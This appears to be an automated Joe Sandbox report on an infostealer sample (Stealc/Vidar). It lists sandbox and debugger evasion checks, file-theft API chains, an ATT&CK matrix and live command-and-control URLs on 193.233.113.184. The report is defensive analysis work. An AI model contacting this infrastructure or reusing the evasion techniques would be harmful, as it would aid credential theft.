                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26115
                  Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27273
                  Source: C:\Users\user\Desktop\file.exeAPI coverage: 7.0 %
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040AE077
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_040AC0D7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040ADCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_040ADCE7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_040B4107
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040AF917
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040A1937
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_040AE697
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_040B3B17
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_040B4B77
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040AEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_040AEF87
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_040B47D7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                  Source: Amcache.hve.3.drBinary or memory string: VMware
                  Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: file.exe, 00000000.00000002.1880902280.0000000002537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: file.exe, 00000000.00000002.1880734671.00000000024AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                  Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: file.exe, 00000000.00000002.1880902280.00000000024EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                  Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26100
                  Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26103
                  Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26114
                  Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26122
                  Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25942
                  Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-26143
                  Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25987
                  Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27471
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_024BF35C push dword ptr fs:[00000030h]0_2_024BF35C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A092B mov eax, dword ptr fs:[00000030h]0_2_040A092B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040A0D90 mov eax, dword ptr fs:[00000030h]0_2_040A0D90
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B99B7 mov eax, dword ptr fs:[00000030h]0_2_040B99B7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040BD151 SetUnhandledExceptionFilter,0_2_040BD151
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040BB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_040BB5A1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040BAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_040BAFAF
                  Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 7484, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_040B9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_040B9867
                  Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                  Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_040B7DF7
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                  Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.3.file.exe.4110000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.4110000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.40a0e67.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.40a0e67.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1880902280.00000000024EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1717820690.0000000004110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 7484, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 0.3.file.exe.4110000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.4110000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.40a0e67.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.40a0e67.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1880902280.00000000024EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1717820690.0000000004110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 7484, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                  Native API
                  1
                  DLL Side-Loading
                  11
                  Process Injection
                  1
                  Masquerading
                  OS Credential Dumping2
                  System Time Discovery
                  Remote ServicesData from Local System1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  1
                  Virtualization/Sandbox Evasion
                  LSASS Memory31
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media2
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Disable or Modify Tools
                  Security Account Manager1
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Process Injection
                  NTDS11
                  Process Discovery
                  Distributed Component Object ModelInput Capture12
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information
                  LSA Secrets1
                  Account Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Obfuscated Files or Information
                  Cached Domain Credentials1
                  System Owner/User Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Software Packing
                  DCSync1
                  File and Directory Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading
                  Proc Filesystem123
                  System Information Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  file.exe100%AviraHEUR/AGEN.1310247
                  file.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://upx.sf.net0%URL Reputationsafe
                  http://193.233.113.184/J(100%Avira URL Cloudmalware
                  http://193.233.113.10%Avira URL Cloudsafe
                  http://193.233.113.184/6d687e53250c2111.php/s100%Avira URL Cloudmalware
                  http://193.233.113.184/6d687e53250c2111.phpc100%Avira URL Cloudmalware
                  http://193.233.113.184/6d687e53250c2111.php100%Avira URL Cloudmalware
                  http://193.233.113.184/100%Avira URL Cloudmalware
                  http://193.233.113.184/6d687e53250c2111.php5S100%Avira URL Cloudmalware
                  http://193.233.113.184/ws100%Avira URL Cloudmalware
                  http://193.233.113.184100%Avira URL Cloudmalware
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://193.233.113.184/true
                  • Avira URL Cloud: malware
                  unknown
                  http://193.233.113.184/6d687e53250c2111.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://193.233.113.184/6d687e53250c2111.phpcfile.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://upx.sf.netAmcache.hve.3.drfalse
                  • URL Reputation: safe
                  unknown
                  http://193.233.113.184/6d687e53250c2111.php/sfile.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.233.113.184file.exe, 00000000.00000002.1880734671.00000000024AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1880902280.00000000024EA000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://193.233.113.184/J(file.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.233.113.1file.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://193.233.113.184/6d687e53250c2111.php5Sfile.exe, 00000000.00000002.1880902280.00000000024EA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  http://193.233.113.184/wsfile.exe, 00000000.00000002.1880902280.000000000251C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  193.233.113.184
                  unknownRussian Federation
                  20549FREE-MPEIRUtrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1518310
                  Start date and time:2024-09-25 15:31:08 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 27s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@2/5@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 24
                  • Number of non-executed functions: 165
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.182.143.212
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • VT rate limit hit for: file.exe
                  TimeTypeDescription
                  09:32:20API Interceptor1x Sleep call for process: WerFault.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  193.233.113.184file.exeGet hashmaliciousStealc, VidarBrowse
                  • 193.233.113.184/6d687e53250c2111.php
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  FREE-MPEIRUfile.exeGet hashmaliciousStealc, VidarBrowse
                  • 193.233.113.184
                  SecuriteInfo.com.Trojan.Crypt.23519.13317.exeGet hashmaliciousUnknownBrowse
                  • 193.233.121.52
                  file.exeGet hashmaliciousDCRatBrowse
                  • 193.233.115.185
                  BitTorrent-7.6.exeGet hashmaliciousUnknownBrowse
                  • 193.233.122.71
                  https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38Get hashmaliciousUnknownBrowse
                  • 193.233.84.115
                  https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38Get hashmaliciousPhisherBrowse
                  • 193.233.84.115
